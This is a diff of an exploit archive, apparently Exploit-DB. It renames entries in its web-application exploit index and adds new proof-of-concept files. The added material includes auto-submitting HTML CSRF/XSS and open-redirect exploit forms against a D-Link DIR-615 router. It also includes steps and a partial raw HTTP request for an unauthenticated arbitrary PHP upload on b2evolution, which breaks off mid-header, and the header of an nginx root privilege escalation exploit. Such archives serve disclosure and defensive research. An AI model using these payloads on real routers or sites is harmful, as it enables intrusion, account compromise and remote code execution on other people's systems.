11596,platforms/php/webapps/11596.txt,"Slaed CMS 4.0 - Multiple Vulnerabilities",2010-02-27,indoushka,php,webapps,0
|
||||
11599,platforms/php/webapps/11599.txt,"Uiga Personal Portal - 'index.php' SQL Injection",2010-02-28,"Easy Laster",php,webapps,0
|
||||
11600,platforms/php/webapps/11600.txt,"Uiga Fan Club - 'index.php' SQL Injection",2010-02-28,"Easy Laster",php,webapps,0
|
||||
11602,platforms/php/webapps/11602.txt,"HazelPress Lite 0.0.4 - (Authentication Bypass) SQL Injection",2010-02-28,cr4wl3r,php,webapps,0
|
||||
11602,platforms/php/webapps/11602.txt,"HazelPress Lite 0.0.4 - Authentication Bypass",2010-02-28,cr4wl3r,php,webapps,0
|
||||
11603,platforms/php/webapps/11603.txt,"Joomla! Component com_yanc - SQL Injection",2010-02-28,snakespc,php,webapps,0
|
||||
11604,platforms/php/webapps/11604.php,"Joomla! Component com_liveticker - Blind SQL Injection",2010-02-28,snakespc,php,webapps,0
|
||||
11605,platforms/php/webapps/11605.txt,"Baykus Yemek Tarifleri 2.1 - SQL Injection",2010-02-28,cr4wl3r,php,webapps,0
|
||||
11606,platforms/asp/webapps/11606.txt,"Majoda CMS - (Authentication Bypass) SQL Injection",2010-02-28,Phenom,asp,webapps,0
|
||||
11606,platforms/asp/webapps/11606.txt,"Majoda CMS - Authentication Bypass",2010-02-28,Phenom,asp,webapps,0
|
||||
11609,platforms/php/webapps/11609.txt,"phptroubleticket 2.0 - 'id' SQL Injection",2010-03-01,kaMtiEz,php,webapps,0
|
||||
11610,platforms/php/webapps/11610.txt,"CMS by MyWorks - Multiple Vulnerabilities",2010-03-01,Palyo34,php,webapps,0
|
||||
11611,platforms/asp/webapps/11611.txt,"Al Sat Scripti - Database Download",2010-03-02,indoushka,asp,webapps,0
|
||||
|
|
@ -22688,7 +22691,7 @@ id,file,description,date,author,platform,type,port
|
|||
11830,platforms/php/webapps/11830.txt,"Fw-BofF (oolime-resurrection) 1.5.3beta - Multiple Remote File Inclusion",2010-03-21,cr4wl3r,php,webapps,0
|
||||
11831,platforms/php/webapps/11831.txt,"WebMaid CMS 0.2-6 Beta - Multiple Remote File Inclusion",2010-03-21,cr4wl3r,php,webapps,0
|
||||
11832,platforms/php/webapps/11832.txt,"NotSopureEdit 1.4.1 - Remote File Inclusion",2010-03-21,cr4wl3r,php,webapps,0
|
||||
11833,platforms/php/webapps/11833.txt,"4x CMS r26 - (Authentication Bypass) SQL Injection",2010-03-21,cr4wl3r,php,webapps,0
|
||||
11833,platforms/php/webapps/11833.txt,"4x CMS r26 - Authentication Bypass",2010-03-21,cr4wl3r,php,webapps,0
|
||||
11835,platforms/php/webapps/11835.txt,"Mini-CMS RibaFS 1.0 - Authentication Bypass",2010-03-22,cr4wl3r,php,webapps,0
|
||||
11836,platforms/php/webapps/11836.txt,"CMS Openpage - 'index.php' SQL Injection",2010-03-22,Phenom,php,webapps,0
|
||||
14128,platforms/php/webapps/14128.txt,"Joomla! Component com_wmtpic 1.0 - SQL Injection",2010-06-30,RoAd_KiLlEr,php,webapps,0
|
||||
|
|
@ -22768,8 +22771,8 @@ id,file,description,date,author,platform,type,port
|
|||
11951,platforms/php/webapps/11951.txt,"E-book Store - Multiple Vulnerabilities (1)",2010-03-30,indoushka,php,webapps,0
|
||||
11954,platforms/php/webapps/11954.txt,"Wazzum Dating Software - Multiple Vulnerabilities",2010-03-30,EL-KAHINA,php,webapps,0
|
||||
11960,platforms/php/webapps/11960.txt,"KimsQ 040109 - Multiple Remote File Inclusion",2010-03-30,mat,php,webapps,0
|
||||
11962,platforms/php/webapps/11962.txt,"Satellite-X 4.0 - (Authentication Bypass) SQL Injection",2010-03-30,indoushka,php,webapps,0
|
||||
11963,platforms/php/webapps/11963.txt,"Huron CMS 8 11 2007 - (Authentication Bypass) SQL Injection",2010-03-30,mat,php,webapps,0
|
||||
11962,platforms/php/webapps/11962.txt,"Satellite-X 4.0 - Authentication Bypass",2010-03-30,indoushka,php,webapps,0
|
||||
11963,platforms/php/webapps/11963.txt,"Huron CMS 8 11 2007 - Authentication Bypass",2010-03-30,mat,php,webapps,0
|
||||
11964,platforms/multiple/webapps/11964.pl,"Easy-Clanpage 2.1 - SQL Injection",2010-03-30,"Easy Laster",multiple,webapps,0
|
||||
11965,platforms/php/webapps/11965.txt,"kora - Reinstall Admin Information",2010-03-30,indoushka,php,webapps,0
|
||||
11967,platforms/php/webapps/11967.txt,"Snipe Photo Gallery - Bypass Arbitrary File Upload",2010-03-30,indoushka,php,webapps,0
|
||||
|
|
@ -22958,7 +22961,7 @@ id,file,description,date,author,platform,type,port
|
|||
12256,platforms/php/webapps/12256.txt,"ilchClan 1.0.5B - SQL Injection",2010-04-16,"Easy Laster",php,webapps,0
|
||||
12257,platforms/php/webapps/12257.txt,"Joomla! Component com_manager 1.5.3 - 'id' Parameter SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
|
||||
12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting",2010-04-16,JosS,php,webapps,0
|
||||
12262,platforms/php/webapps/12262.php,"Zyke CMS 1.1 - (Authentication Bypass) SQL Injection",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0
|
||||
12262,platforms/php/webapps/12262.php,"Zyke CMS 1.1 - Authentication Bypass",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0
|
||||
12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password)",2010-04-16,EL-KAHINA,php,webapps,0
|
||||
12267,platforms/php/webapps/12267.txt,"WebAdmin - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
|
||||
12268,platforms/php/webapps/12268.txt,"Uploader 0.7 - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
|
||||
|
|
@ -23231,11 +23234,11 @@ id,file,description,date,author,platform,type,port
|
|||
12679,platforms/windows/webapps/12679.txt,"3Com* iMC (Intelligent Management Center) - Unauthenticated File Retrieval (Traversal)",2010-05-21,"Richard Brain",windows,webapps,0
|
||||
12680,platforms/windows/webapps/12680.txt,"3Com* iMC (Intelligent Management Center) - Cross-Site Scripting / Information Disclosure Flaws",2010-05-21,"Richard Brain",windows,webapps,0
|
||||
12684,platforms/php/webapps/12684.txt,"ConPresso 4.0.7 - SQL Injection",2010-05-21,Gamoscu,php,webapps,0
|
||||
12686,platforms/php/webapps/12686.txt,"Online University - (Authentication Bypass) SQL Injection",2010-05-21,cr4wl3r,php,webapps,0
|
||||
12686,platforms/php/webapps/12686.txt,"Online University - Authentication Bypass",2010-05-21,cr4wl3r,php,webapps,0
|
||||
12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery 3.1 - 'gallery.php' Remote File Inclusion",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0
|
||||
12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration Console - Authenticated Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0
|
||||
12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload",2010-05-21,Ma3sTr0-Dz,php,webapps,0
|
||||
12691,platforms/php/webapps/12691.txt,"Online Job Board - (Authentication Bypass) SQL Injection",2010-05-21,cr4wl3r,php,webapps,0
|
||||
12691,platforms/php/webapps/12691.txt,"Online Job Board - Authentication Bypass",2010-05-21,cr4wl3r,php,webapps,0
|
||||
14322,platforms/php/webapps/14322.txt,"Edgephp ClickBank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
|
||||
12692,platforms/php/webapps/12692.txt,"WordPress Plugin TinyBrowser - Arbitrary File Upload",2010-05-22,Ra3cH,php,webapps,0
|
||||
12693,platforms/asp/webapps/12693.txt,"Asset Manager - Arbitrary File Upload",2010-05-22,Ra3cH,asp,webapps,0
|
||||
|
|
@ -24007,7 +24010,7 @@ id,file,description,date,author,platform,type,port
|
|||
15135,platforms/php/webapps/15135.txt,"Car Portal 2.0 - Blind SQL Injection",2010-09-27,**RoAd_KiLlEr**,php,webapps,0
|
||||
15143,platforms/php/webapps/15143.txt,"e107 0.7.23 - SQL Injection",2010-09-28,"High-Tech Bridge SA",php,webapps,0
|
||||
15139,platforms/asp/webapps/15139.txt,"AtomatiCMS - Upload Arbitrary File",2010-09-28,Abysssec,asp,webapps,0
|
||||
15141,platforms/php/webapps/15141.txt,"JE CMS 1.0.0 - Authentication Bypass (via SQL Injection)",2010-09-28,Abysssec,php,webapps,0
|
||||
15141,platforms/php/webapps/15141.txt,"JE CMS 1.0.0 - Authentication Bypass",2010-09-28,Abysssec,php,webapps,0
|
||||
15144,platforms/windows/webapps/15144.txt,"Aleza Portal 1.6 - Insecure (SQL Injection) Cookie Handling",2010-09-28,KnocKout,windows,webapps,0
|
||||
15145,platforms/php/webapps/15145.txt,"Achievo 1.4.3 - Multiple Authorisation Flaws",2010-09-28,"Pablo Milano",php,webapps,0
|
||||
15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - Cross-Site Request Forgery",2010-09-28,"Pablo Milano",php,webapps,0
|
||||
|
|
@ -24827,7 +24830,7 @@ id,file,description,date,author,platform,type,port
|
|||
17555,platforms/php/webapps/17555.txt,"vBulletin 4.0.x 4.1.3 - (messagegroupid) SQL Injection",2011-07-21,fb1h2s,php,webapps,0
|
||||
17556,platforms/php/webapps/17556.txt,"Joomla! Component JE Story Submit - Local File Inclusion",2011-07-21,v3n0m,php,webapps,0
|
||||
17560,platforms/php/webapps/17560.txt,"Joomla! Component 'mod_spo' - SQL Injection",2011-07-21,SeguridadBlanca,php,webapps,0
|
||||
17562,platforms/php/webapps/17562.php,"ExtCalendar2 - (Authentication Bypass/Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0
|
||||
17562,platforms/php/webapps/17562.php,"ExtCalendar2 - (Authentication Bypass / Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0
|
||||
17574,platforms/jsp/webapps/17574.php,"CA ARCserve D2D r15 GWT RPC - Multiple Vulnerabilities",2011-07-26,rgod,jsp,webapps,0
|
||||
17570,platforms/php/webapps/17570.txt,"MusicBox 3.7 - Multiple Vulnerabilities",2011-07-25,R@1D3N,php,webapps,0
|
||||
17571,platforms/php/webapps/17571.txt,"OpenX Ad Server 2.8.7 - Cross-Site Request Forgery",2011-07-26,"Narendra Shinde",php,webapps,0
|
||||
|
|
@ -25449,7 +25452,7 @@ id,file,description,date,author,platform,type,port
|
|||
18999,platforms/php/webapps/18999.php,"SN News 1.2 - (visualiza.php) SQL Injection",2012-06-06,WhiteCollarGroup,php,webapps,0
|
||||
19012,platforms/php/webapps/19012.txt,"WordPress Plugin Front File Manager 0.1 - Arbitrary File Upload",2012-06-08,"Adrien Thierry",php,webapps,0
|
||||
19013,platforms/php/webapps/19013.txt,"WordPress Plugin Easy Contact Forms Export 1.1.0 - Information Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0
|
||||
19005,platforms/php/webapps/19005.txt,"SN News 1.2 - '/admin/loger.php' Authentication Bypass (SQL Injection)",2012-06-07,"Yakir Wizman",php,webapps,0
|
||||
19005,platforms/php/webapps/19005.txt,"SN News 1.2 - '/admin/loger.php' Authentication Bypass",2012-06-07,"Yakir Wizman",php,webapps,0
|
||||
19003,platforms/php/webapps/19003.txt,"vanilla kpoll plugin 1.2 - Persistent Cross-Site Scripting",2012-06-06,"Henry Hoggard",php,webapps,0
|
||||
19007,platforms/php/webapps/19007.php,"PHPNet 1.8 - (ler.php) SQL Injection",2012-06-07,WhiteCollarGroup,php,webapps,0
|
||||
19008,platforms/php/webapps/19008.php,"WordPress Plugin Front End Upload 0.5.3 - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0
|
||||
|
|
@ -27012,7 +27015,7 @@ id,file,description,date,author,platform,type,port
|
|||
24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0
|
||||
24531,platforms/php/webapps/24531.txt,"Web Cookbook - Multiple Vulnerabilities",2013-02-21,cr4wl3r,php,webapps,0
|
||||
24530,platforms/php/webapps/24530.txt,"CKEditor 4.0.1 - Multiple Vulnerabilities",2013-02-20,AkaStep,php,webapps,0
|
||||
24533,platforms/php/webapps/24533.txt,"RTTucson Quotations Database Script - (Authentication Bypass) SQL Injection",2013-02-21,cr4wl3r,php,webapps,0
|
||||
24533,platforms/php/webapps/24533.txt,"RTTucson Quotations Database Script - Authentication Bypass",2013-02-21,cr4wl3r,php,webapps,0
|
||||
24534,platforms/windows/webapps/24534.txt,"Alt-N MDaemon 13.0.3 / 12.5.6 - Email Body HTML/JS Injection",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0
|
||||
24535,platforms/windows/webapps/24535.txt,"Alt-N MDaemon WorldClient 13.0.3 - Multiple Vulnerabilities",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0
|
||||
24536,platforms/php/webapps/24536.txt,"glFusion 1.2.2 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-21,"High-Tech Bridge SA",php,webapps,0
|
||||
|
|
@ -28611,7 +28614,7 @@ id,file,description,date,author,platform,type,port
|
|||
26867,platforms/php/webapps/26867.txt,"PHP Fusebox 3.0 - 'index.php' Cross-Site Scripting",2005-12-19,"bogel and lukman",php,webapps,0
|
||||
26868,platforms/php/webapps/26868.txt,"jPORTAL 2.2.1/2.3 Forum - 'forum.php' SQL Injection",2005-12-19,Zbigniew,php,webapps,0
|
||||
26870,platforms/php/webapps/26870.txt,"Advanced Guestbook 2.x - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,Handrix,php,webapps,0
|
||||
26871,platforms/php/webapps/26871.txt,"PlaySms - 'index.php' Cross-Site Scripting",2005-12-19,mohajali2k4,php,webapps,0
|
||||
26871,platforms/php/webapps/26871.txt,"PlaySms 0.8 - 'index.php' Cross-Site Scripting",2005-12-19,mohajali2k4,php,webapps,0
|
||||
26872,platforms/php/webapps/26872.txt,"PHP-Fusion 6.0 - 'members.php' Cross-Site Scripting",2005-12-19,krasza,php,webapps,0
|
||||
26873,platforms/asp/webapps/26873.txt,"Acidcat CMS 2.1.13 - 'ID' Parameter SQL Injection",2005-12-19,admin@hamid.ir,asp,webapps,0
|
||||
26874,platforms/asp/webapps/26874.txt,"Acidcat CMS 2.1.13 - 'acidcat.mdb' Remote Information Disclosure",2005-12-19,admin@hamid.ir,asp,webapps,0
|
||||
|
|
@ -29544,7 +29547,7 @@ id,file,description,date,author,platform,type,port
|
|||
28124,platforms/php/webapps/28124.pl,"MKPortal 1.0.1 - 'index.php' Directory Traversal",2006-06-28,rUnViRuS,php,webapps,0
|
||||
28125,platforms/php/webapps/28125.txt,"PHPClassifieds.Info - Multiple Input Validation Vulnerabilities",2006-06-28,Luny,php,webapps,0
|
||||
28126,platforms/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon - 'video.php value Parameter' SQL Injection",2013-09-06,"Easy Laster",php,webapps,0
|
||||
28129,platforms/php/webapps/28129.txt,"Practico CMS 13.7 - Authentication Bypass (SQL Injection)",2013-09-06,shiZheni,php,webapps,0
|
||||
28129,platforms/php/webapps/28129.txt,"Practico CMS 13.7 - Authentication Bypass",2013-09-06,shiZheni,php,webapps,0
|
||||
28131,platforms/php/webapps/28131.txt,"PHP ICalender 2.22 - 'index.php' Cross-Site Scripting",2006-06-29,"Kurdish Security",php,webapps,0
|
||||
28132,platforms/php/webapps/28132.txt,"newsPHP 2006 PRO - 'index.php' Multiple Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0
|
||||
28133,platforms/php/webapps/28133.txt,"newsPHP 2006 PRO - 'index.php' Multiple Parameter SQL Injection",2006-06-29,securityconnection,php,webapps,0
|
||||
|
|
@ -30217,6 +30220,7 @@ id,file,description,date,author,platform,type,port
|
|||
29049,platforms/php/webapps/29049.txt,"BlogTorrent Preview 0.92 - Announce.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0
|
||||
29050,platforms/php/webapps/29050.txt,"Odysseus Blog 1.0 - blog.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0
|
||||
29051,platforms/php/webapps/29051.txt,"Sphpblog 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,the_Edit0r,php,webapps,0
|
||||
41035,platforms/php/webapps/41035.txt,"Airbnb Clone Script - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
|
||||
29053,platforms/asp/webapps/29053.txt,"Image Gallery with Access Database - dispimage.asp id Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0
|
||||
29054,platforms/asp/webapps/29054.txt,"Image Gallery with Access Database - default.asp Multiple Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0
|
||||
29058,platforms/php/webapps/29058.txt,"phpMyAdmin 2.x - db_create.php db Parameter Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0
|
||||
|
|
@ -35326,7 +35330,7 @@ id,file,description,date,author,platform,type,port
|
|||
37283,platforms/php/webapps/37283.txt,"AZ Photo Album - Cross-Site Scripting / Arbitrary File Upload",2012-05-20,"Eyup CELIK",php,webapps,0
|
||||
37316,platforms/php/webapps/37316.txt,"phpCollab 2.5 - Unauthenticated Direct Request Multiple Protected Page Access",2012-05-24,"team ' and 1=1--",php,webapps,0
|
||||
37354,platforms/php/webapps/37354.py,"Bigware Shop 2.1x - 'main_bigware_54.php' SQL Injection",2012-06-05,rwenzel,php,webapps,0
|
||||
37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Authentication Bypass) SQL Injection",2015-06-15,"walid naceri",php,webapps,0
|
||||
37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - Authentication Bypass",2015-06-15,"walid naceri",php,webapps,0
|
||||
37329,platforms/php/webapps/37329.txt,"Nilehoster Topics Viewer 2.3 - Multiple SQL Injections / Local File Inclusion",2012-05-27,n4ss1m,php,webapps,0
|
||||
37330,platforms/php/webapps/37330.txt,"Yamamah Photo Gallery 1.1 - Database Information Disclosure",2012-05-28,L3b-r1'z,php,webapps,0
|
||||
37331,platforms/php/webapps/37331.py,"WHMCS - 'boleto_bb.php' SQL Injection",2012-05-29,dex,php,webapps,0
|
||||
|
|
@ -36743,7 +36747,7 @@ id,file,description,date,author,platform,type,port
|
|||
40214,platforms/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80
|
||||
40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - 'strong_user.php' Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80
|
||||
40216,platforms/jsp/webapps/40216.txt,"Navis Webaccess - SQL Injection",2016-08-08,bRpsd,jsp,webapps,9000
|
||||
40218,platforms/php/webapps/40218.txt,"PHPCollab CMS 2.5 - (emailusers.php) SQL Injection",2016-08-08,Vulnerability-Lab,php,webapps,80
|
||||
40218,platforms/php/webapps/40218.txt,"PHPCollab CMS 2.5 - 'emailusers.php' SQL Injection",2016-08-08,Vulnerability-Lab,php,webapps,80
|
||||
40220,platforms/php/webapps/40220.txt,"WordPress Plugin Add From Server < 3.3.2 - Cross-Site Request Forgery (Arbitrary File Upload)",2016-08-08,"Edwin Molenaar",php,webapps,80
|
||||
40221,platforms/php/webapps/40221.txt,"Nagios Network Analyzer 2.2.1 - Multiple Cross-Site Request Forgery",2016-08-10,hyp3rlinx,php,webapps,80
|
||||
40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server-Side Request Forgery",2016-08-10,"Dawid Golunski",php,webapps,80
|
||||
|
|
@ -36960,8 +36964,17 @@ id,file,description,date,author,platform,type,port
|
|||
41006,platforms/php/webapps/41006.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation",2017-01-10,"Kacper Szurek",php,webapps,0
|
||||
41007,platforms/php/webapps/41007.html,"FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)",2017-01-10,"Ihsan Sencan",php,webapps,0
|
||||
41009,platforms/php/webapps/41009.txt,"Starting Page 1.3 - 'category' Parameter SQL Injection",2017-01-11,"Ben Lee",php,webapps,0
|
||||
41010,platforms/php/webapps/41010.txt,"My link trader 1.1 - 'id' Parameter SQL Injection",2017-01-11,"Dawid Morawski",php,webapps,0
|
||||
41010,platforms/php/webapps/41010.txt,"My Link Trader 1.1 - 'id' Parameter SQL Injection",2017-01-11,"Dawid Morawski",php,webapps,0
|
||||
41011,platforms/php/webapps/41011.txt,"b2evolution 6.8.2 - Arbitrary File Upload",2016-12-29,"Li Fei",php,webapps,0
|
||||
41014,platforms/java/webapps/41014.txt,"Blackboard LMS 9.1 SP14 - Cross-Site Scripting",2017-01-09,Vulnerability-Lab,java,webapps,0
|
||||
41017,platforms/hardware/webapps/41017.txt,"Huawei Flybox B660 - Cross-Site Request Forgery",2017-01-10,Vulnerability-Lab,hardware,webapps,0
|
||||
41023,platforms/php/webapps/41023.txt,"Travel Portal Script 9.33 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
|
||||
41024,platforms/php/webapps/41024.txt,"Movie Portal Script 7.35 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
|
||||
41028,platforms/php/webapps/41028.txt,"Job Portal Script 9.11 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps,0
|
||||
41029,platforms/php/webapps/41029.txt,"Online Food Delivery 2.04 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps,0
|
||||
41032,platforms/php/webapps/41032.pl,"iTechscripts Freelancer Script 5.11 - 'sk' Parameter SQL Injection",2017-01-11,v3n0m,php,webapps,0
|
||||
41033,platforms/hardware/webapps/41033.txt,"D-Link DIR-615 - Multiple Vulnerabilities",2017-01-10,"Osanda Malith",hardware,webapps,0
|
||||
41034,platforms/php/webapps/41034.txt,"School Management Software 2.75 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
|
||||
41036,platforms/php/webapps/41036.txt,"Penny Auction Script - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
|
||||
41037,platforms/php/webapps/41037.txt,"ECommerce-TIBSECART - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
|
||||
41038,platforms/php/webapps/41038.txt,"ECommerce-Multi-Vendor Software - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
83
platforms/hardware/webapps/41033.txt
Executable file
83
platforms/hardware/webapps/41033.txt
Executable file
|
|
@ -0,0 +1,83 @@
|
|||
# Title: D-Link DIR-615 Multiple Vulnerabilities
|
||||
# Date: 10-01-2017
|
||||
# Hardware Version: E3
|
||||
# Firmware Version: 5.10
|
||||
# Tested on: Windows 8 64-bit
|
||||
# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
|
||||
# Original write-up:https://osandamalith.com/2017/01/04/d-link-dir-615-open-redirection-and-xss/
|
||||
|
||||
Overview
|
||||
--------
|
||||
|
||||
The 'apply.cgi' file was vulnerable to Open Redirection and XSS. Inside the router many other cgi files too use this functionality in 'apply.cgi'. For example the 'ping_response.cgi' file.
|
||||
|
||||
Open Redirection
|
||||
-----------------
|
||||
# apply.cgi
|
||||
|
||||
<html>
|
||||
<!-- @OsandaMalith -->
|
||||
<body>
|
||||
<form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
|
||||
<input type="hidden" name="html_response_page" value="https://google.lk" />
|
||||
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
|
||||
<img src=x onerror="exploit.submit()"/>
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
# ping_response.cgi
|
||||
|
||||
<html>
|
||||
<!-- @OsandaMalith -->
|
||||
<body>
|
||||
<form action="http://192.168.0.1/ping_response.cgi" method="POST" id="exploit">
|
||||
<input type="hidden" name="html_response_page" value="https://google.lk" />
|
||||
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
|
||||
<input type="hidden" name="ping_ipaddr" value="192.168.0.101" />
|
||||
<input type="hidden" name="ping" value="Ping" />
|
||||
<img src=x onerror="exploit.submit()"/>
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
POST XSS
|
||||
---------
|
||||
|
||||
# apply.cgi
|
||||
|
||||
<html>
|
||||
<!-- @OsandaMalith -->
|
||||
<body>
|
||||
<form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
|
||||
<input type="hidden" name="html_response_page" value="javascript:confirm(/@OsandaMalith/)" />
|
||||
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
|
||||
<img src=x onerror="exploit.submit()"/>
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
# ping_response.cgi
|
||||
|
||||
<html>
|
||||
<!-- @OsandaMalith -->
|
||||
<body>
|
||||
<form action="http://192.168.0.1/ping_response.cgi" method="POST" id="exploit">
|
||||
<input type="hidden" name="html_response_page" value="javascript:confirm(/@OsandaMalith/)" />
|
||||
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
|
||||
<input type="hidden" name="ping_ipaddr" value="127.0.0.1" />
|
||||
<input type="hidden" name="ping" value="Ping" />
|
||||
<img src=x onerror="exploit.submit()"/>
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
Disclosure Timeline
|
||||
--------------------
|
||||
|
||||
12/19/16: Reported to D-Link
|
||||
12/21/16: Security Patch released
|
||||
ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-615/REVT/DIR-615_REVT_RELEASE_NOTES_20.12PTb01.pdf
|
||||
|
|
@ -1,8 +1,6 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Source: http://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
|
||||
#
|
||||
# Nginx (Debian-based distros) - Root Privilege Escalation PoC Exploit
|
||||
# Nginx (Debian-based distros + Gentoo) - Root Privilege Escalation PoC Exploit
|
||||
# nginxed-root.sh (ver. 1.0)
|
||||
#
|
||||
# CVE-2016-1247
|
||||
|
|
@ -18,8 +16,8 @@
|
|||
#
|
||||
# ---
|
||||
# This PoC exploit allows local attackers on Debian-based systems (Debian, Ubuntu
|
||||
# etc.) to escalate their privileges from nginx web server user (www-data) to root
|
||||
# through unsafe error log handling.
|
||||
# as well as Gentoo etc.) to escalate their privileges from nginx web server user
|
||||
# (www-data) to root through unsafe error log handling.
|
||||
#
|
||||
# The exploit waits for Nginx server to be restarted or receive a USR1 signal.
|
||||
# On Debian-based systems the USR1 signal is sent by logrotate (/etc/logrotate.d/nginx)
|
||||
|
|
|
|||
125
platforms/php/webapps/41011.txt
Executable file
125
platforms/php/webapps/41011.txt
Executable file
|
|
@ -0,0 +1,125 @@
|
|||
# Exploit Title: b2evolution6.8.2stable – Upload
|
||||
# Date: 29/12/2016
|
||||
# Exploit Author: Li Fei
|
||||
# Vendor Homepage: http://b2evolution.net/
|
||||
# Software Link: http://b2evolution.net/downloads/6-8-2-stable?download=6407
|
||||
# Version: 6.8.2
|
||||
# Tested on: win7 64bit
|
||||
|
||||
No need admin access for upload files and we can upload any file without bypass(.php,.exe,....)
|
||||
|
||||
1-goto http://localhost/b2evolution/index.php/a/extended-post
|
||||
|
||||
2- click on Browse botton and select you`re file
|
||||
|
||||
3- click on upload
|
||||
|
||||
Ceshi.php path is:
|
||||
|
||||
http://SiteName/ceshi.php
|
||||
|
||||
poc url:
|
||||
|
||||
POST /b2evolution/htsrv/comment_post.php HTTP/1.1
|
||||
|
||||
Poc header:
|
||||
|
||||
Host: localhost
|
||||
|
||||
Content-Length: 1054
|
||||
|
||||
Cache-Control: max-age=0
|
||||
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
|
||||
Origin: http://localhost
|
||||
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
|
||||
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZ4hUYCjABZB7YSL
|
||||
|
||||
Referer: http://localhost/b2evolution/index.php/a/extended-post
|
||||
|
||||
Accept-Encoding: gzip, deflate
|
||||
|
||||
Accept-Language: zh-CN,zh;q=0.8
|
||||
|
||||
